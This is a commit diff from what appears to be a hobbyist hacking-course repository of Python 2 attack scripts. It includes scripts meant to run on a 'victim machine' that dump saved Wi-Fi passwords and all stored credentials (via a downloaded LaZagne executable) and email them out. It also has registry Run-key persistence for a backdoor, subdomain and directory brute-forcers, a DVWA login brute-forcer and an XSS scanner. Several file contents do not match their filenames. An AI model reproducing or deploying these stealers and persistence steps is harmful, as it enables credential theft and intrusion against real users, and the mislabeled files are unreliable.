Updated

Author: root

10 arpspoof_detector/arpspoof_detector.py

@@ -1,4 +1,7 @@
 #!/usr/bin/python2
+#put the script in startup folder to run when the system boots
+#put in /etc/init.d/script.py make executable sudo chmod 755 /etc/init.d/scipt.py
+#Register script to be run at startup sudo update-rc.d superscript defaults
 
 import scapy.all as scapy
 

11 execute_sys_cmd_report/report_windows_wifipassword_toemail.py renamed to 11 execute_sys_cmd_report/report_windows_wifi_password_to_email.py

@@ -1,4 +1,6 @@
 #!/usr/bin/python2.7
+#copy the script to victim machine this scripts should run on victim side windows_host 
+#get saved wifi password and send a gather information to the mail address mention in the script
 
 import subprocess
 import smtplib
@@ -18,9 +20,10 @@ def send_mail(email,password,message):
 
 result = ""
 for network_name in network_names_list:
-	command = "netsh wlan show profile" +network_name+" key=clear"
+	command = "netsh wlan show profile %s key=clear"%network_name
+	#to get each and every network saved in the system
 	current_result = subprocess.check_output(command,shell=True)
 	result = result + current_result
 
 
-send_mail("mail@gmail.com","password",result)
+send_mail("user@mail.com","password",result)

13 recover_saved_passwd_on_target/download_lazagne_execute_report_toemail.py renamed to 13 recover_saved_passwd_on_target/report_windows_saved_password_to_email.py

@@ -1,4 +1,9 @@
 #!/usr/bin/python2.7
+#The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.
+#https://github.com/AlessandroZ/LaZagne  download this LaZagne file 
+#it works on Windows, linux, mac but in this script we use lazagne.exe to recover passwords
+#copy the script to victim machine this scripts should run on victim side windows_host 
+
 
 import requests
 import subprocess
@@ -26,6 +31,8 @@ def send_mail(email,password,message):
 temp_directory = tempfile.gettempdir()
 os.chdir(temp_directory)
 download("http://localhost where lazagne .exe is stored")
+#host lazagne.exe on webserver put that link to download the lazagne.exe or 
+#copy the lazagne.exe to victim and run his script in that path
 result = subprocess.check_output("lazagne.exe all",shell=True)
 send_mail("[email protected]","password",result)
 os.remove("lazagne.exe")

16 pyinstaller/pyinstaller.txt

@@ -1,6 +1,6 @@
 pyinstaller
 
-install pyinstaller to convert and pack all python code into 1 executable for the targetted operating system
+install pyinstaller to convert and pack all python code into 1 executable for the target operating system
 
 pip install pyinstaller 
 #for linux
@@ -29,7 +29,7 @@ subprocess.check_output(commmad,shell=True,stderr=subprocess.DEVNULL,stdin=subpr
 DEVNULL = open(os.devnull,"wb")
 subprocess.check_output(commmad,shell=True,stderr=DEVNULL,stdin=DEVNULL)
 
-To create a Python Executable it better to do that os environment
+To create a Python Executable it better to do in the same os environment similar to your target
 that is to run a py executable in windows 
 create the py exe in windows operating system with the required lib and modules is installed and then put the py exe in victim system to run
 
@@ -47,17 +47,12 @@ pip install in windows interpreter of linux
 
 ~/.wine/drive_c/Python27/wine python.exe -m pip install pyinstaller
 
+
+
 Maintain persistent by puting the script in startup when the os boot these scripts always gets loaded
 
 in windows Registry
 Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 
 in cmd prompt we can change value
-reg add HKCV\Software\Microsoft\Windows\CurrentVersion\Run /v name /t REG_SZ /d "location of backdoor.exe"
-
-Trojans
-
-Trojans is a file that looks and function like a normal file like image,pdf,song
-
-when the user clicks on it the image open on foreground and script run invisible in background
-
+reg add HKCV\Software\Microsoft\Windows\CurrentVersion\Run /v name /t REG_SZ /d "location of backdoor.exe"

17 crawler/common.txt renamed to 17 crawler/common_dir.txt

@@ -0,0 +1,32 @@
+#!/usr/bin/python2.7
+#discover hidden directory by bruteforceing common directory name 
+#if we get a respond then their is a directory then we also get the recursive of the directory.
+
+import requests
+
+def request(url):
+	try:
+		return requests.get("http://" + url)
+	except requests.exceptions.ConnectionError:
+		pass
+
+path=[]
+def dirdiscover(url):
+	with open("common_dir.txt","r") as wordlist_file:
+		for line in wordlist_file:
+			word = line.strip()
+			test_url = url + "/" + word
+			response = request(test_url)
+			if response :
+				print "[+] Discovered URL ----> " + test_url
+				path.append(word)
+
+url="192.168.44.101/mutillidae"
+#edit the url you want to scan
+dirdiscover(url)
+
+#recursively gothrough each and every path		
+for paths in path:
+	dirdiscover(url+"/"+ paths)
+
+

17 crawler/crawler_1.py

@@ -1,4 +1,6 @@
-#!/usr/bin/python
+#!/usr/bin/python2.7
+#dicover subdomains of domain by bruteforcing common sub domains to the domain and
+#if we get a respond then the sub-domain exist 
 
 import requests
 from datetime import datetime
@@ -12,20 +14,20 @@ def request(url):
 		pass
 
 target_url = "google.com"
-subdomain_list = []
+#subdomain_list = []
 file = open("googlesubdomain.txt","aw")
-with open("subdomain19","r") as wordlist_file:
+with open("top_10_subdomain.txt","r") as wordlist_file:
 	for line in wordlist_file:
 		word = line.strip()
 		test_url = word + "." + target_url
 		response = request(test_url)
 		if response :
 			print "[+] Discovered subdomain ----> "+test_url
-			subdomain_list.append(test_url)
+			#subdomain_list.append(test_url)
 			file.write(test_url+"\n")
 file.close()
 
 stop=datetime.now()
 
 totaltime=stop-start
-print "TotalTime = ",totaltime
+print "\n[***]TotalTimeTaken = ",totaltime

17 crawler/crawler_2.py

@@ -153,3 +153,15 @@ hangout.google.com
 spaces.google.com
 gears.google.com
 answer.google.com
+sky.google.com
+surveys.google.com
+plus.google.com
+xmpp.google.com
+www.google.com
+mail.google.com
+www.google.com
+mail.google.com
+www.google.com
+mail.google.com
+www.google.com
+mail.google.com

17 crawler/crawler_3.py

@@ -0,0 +1,10 @@
+www
+mail
+ftp
+localhost
+webmail
+smtp
+webdisk
+pop
+cpanel
+whm

17 crawler/discover_all_directory_in_domain.py

@@ -1,4 +1,5 @@
-#!/usr/bin/python
+#!/usr/bin/python2.7
+#discover urls in the domain by extract the href link in the content and crawl recursively to get all urls
 
 import requests
 import re
@@ -17,12 +18,12 @@ def crawl(url):
 	for link in href_links:
 		link = urlparse.urljoin(url,link)
 
-		if "#" in link:	# #r refers to original page so avoid duplicate page again and again
+		if "#" in link:	# # refers to original page so avoid duplicate page again and again
 			link = link.split("#")[0]
 
 		if target_url in link and link not in target_links: #to avoid repeating the same url
 			target_links.append(link)
-			print link
-			crawl(link) #recurrsively crawling
+			print "[+]urls --->",link
+			crawl(link) #recursively crawling
 
 crawl(target_url)

17 crawler/testing_google_subdomain/crawler_1.py renamed to 17 crawler/testing_google_subdomain/discover_subdomains_of_domain.py

@@ -3,7 +3,7 @@
 import requests
 import re
 
-target_url = "http://192.168.43.1"
+target_url = "http://192.168.44.101"
 
 def extract_links_from(url):
 	response = requests.get(url)

17 crawler/testing_google_subdomain/googlesubdomain.txt

@@ -4,7 +4,7 @@
 import re
 import urlparse
 
-target_url = "http://192.168.43.1"
+target_url = "http://192.168.44.101"
 target_links = []
 
 def extract_links_from(url):

17 crawler/testing_google_subdomain/top_10_subdomain.txt

@@ -1,4 +1,7 @@
-#!/usr/bin/python
+#!/usr/bin/python2.7
+#bruteforce login form password with list of password by check the response content 
+#if the response content has "Login failed" the password is incorrect so if it not the passed value is the password 
+#Here i used Damn Vulnerable Web App to test you can get the Metasploitable2 virtualbox to use DVWA
 
 import requests
 

18 spider/spider_3.py renamed to 18 spider/discover_urls_in_domain.py

@@ -0,0 +1,16 @@
+#!/usr/bin/python2.7
+#fill form with scipt by passing the value in data_dict then send that has POST Request
+#we can automate the form filling process by import data from file and by put in loop to fill each and every data and exit after filing the final data
+#the html_form.zip is given to test this script
+#put the files in /var/www/html/* location
+#start your own web server and test it !!
+
+import requests
+
+target_url = "http://127.0.0.1/process.php"
+data_dict = {"user":"admin","pass":"password","Login":"submit"}
+response = requests.post(target_url, data=data_dict)
+
+print response
+print response.content
+

18 spider/spider_1.py

@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/python2.7
 
 import requests
 
@@ -8,3 +8,4 @@
 
 print response
 print response.content
+

18 spider/spider_2.py

@@ -1,11 +1,16 @@
-#!/usr/bin/python
+#!/usr/bin/python2.7
+#find xss vulnerability in forms and urls this works by finding the urls and form and try to inject the code
+#if the code gets injected then it is vulnerable to xss 
+#don't sticky to this code itself this is nothing explorer others xss_vulnerabilty code online
+#this works on Damn Vulnerable Web App only
 
 import requests
 import re
 import urlparse
 from BeautifulSoup import BeautifulSoup
 
 class Scanner:
+
 	def __init__(self,url,ignore_links):
 		self.session = requests.Session()
 		self.target_url = url
@@ -30,7 +35,7 @@ def crawl(self,url=None):
 			if self.target_url in link and link not in self.target_links and link not in self.links_to_ignore:
 			#to avoid repeating the same url and ignore logout url
 				self.target_links.append(link)
-				print link
+				#print link
 				self.crawl(link)
 
 	def extract_forms(self,url):
@@ -65,24 +70,41 @@ def run_scanner(self):
 				print "[+] Testing form in " + link
 				is_vulnerable_to_xss = self.test_xss_in_form(form,link)
 				if is_vulnerable_to_xss:
-					print "\n\n[***] XSS discovered in "+link+" in the follwing form"
+					print "--"*50
+					print "[*****] XSS discovered in "+link+" in the following form:"
 					print form
-
+					print "--"*50
 
 			if "=" in link:
-				print "\n\n[+] Testing " + link
+				print "[+] Testing " + link
 				if_vulnerable_to_xss = self.test_xss_in_link(link)
 				if is_vulnerable_to_xss:
-					print "[***] Discovered XSS in " + link
+					print "--"*50
+					print "[*****] Discovered XSS in " + link
+					print link
+					print "--"*50	
 
 	def test_xss_in_link(self,url):
 		xss_test_script = "<sCript>alert('test')</scriPt>"
 		url = url.replace("=","="+ xss_test_script)
 		response = self.session.get(url)
-
 		return xss_test_script in response.content
 
 	def test_xss_in_form(self,form,url):
 		xss_test_script = "<sCript>alert('test')</scriPt>"
 		response = self.submit_form(form,xss_test_script,url)
-		return xss_test_script in response.content
+		return xss_test_script in response.content
+
+
+target_url = "http://192.168.44.101/dvwa/"
+links_to_ignore = ["http://192.168.44.101/dvwa/logout.php"]
+vuln_scanner = Scanner(target_url,links_to_ignore)
+
+data_dict = {"username":"admin","password":"password","Login":"submit"}
+vuln_scanner.session.post("http://192.168.44.101/dvwa/login.php",data=data_dict)
+#to login to get more links to test
+
+vuln_scanner.crawl()
+#crawl through the links
+vuln_scanner.run_scanner()
+#run scan on each links crawled